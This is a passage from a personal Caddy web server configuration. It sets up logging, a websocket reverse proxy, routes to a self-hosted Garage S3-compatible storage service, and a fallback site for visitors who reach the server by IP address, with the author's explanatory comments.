			roll_keep_for 720h
		}
		format json
		level INFO
	}
	@websockets {
		header Connection *Upgrade*
		header Upgrade websocket
	}
	reverse_proxy @websockets localhost:7890
	encode zstd gzip
	file_server
}
# Routes for garagehq, a selfhosted s3 like file service provider.
# Followed https://garagehq.deuxfleurs.fr/documentation/quick-start/
# and not much additional work needed. Have only actually used the s3.garage
# routes thus far so only know those work for sure. Personally found the
# health checks too noisy and have them disabled but leaving here for completeness
s3.garage.internal, *.s3.garage.internal {
	log {
		output file /var/log/caddy/s3.garage.internal.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level INFO
	}
	reverse_proxy localhost:3900 {
		health_uri      /health
		health_port     3900
		health_interval 15s
		health_timeout  5s
	}
}
web.garage.internal {
	reverse_proxy localhost:3902
}
admin.garage.internal {
	reverse_proxy localhost:3903
}
# For all the folks that hit my server by IP address directly, plus my internal
# network. I don't use the rate limiter here, mostly for data-collection reasons.
# The content served is another simple template grabbed from https://html5up.net/
http://a.b.c.d, https://a.b.c.d, http://10.0.0.2, https://10.0.0.2 {
	tls internal
	root * /var/www/ip-direct
	import susser
	log {
		output file /var/log/caddy/ip.access.json {
			roll_size 50MB
			roll_keep 10
			roll_keep_for 720h
		}
		format json
		level DEBUG
	}
	encode zstd gzip
	file_server
	handle_errors 404 {
		rewrite * /404.html
		file_server
	}
}
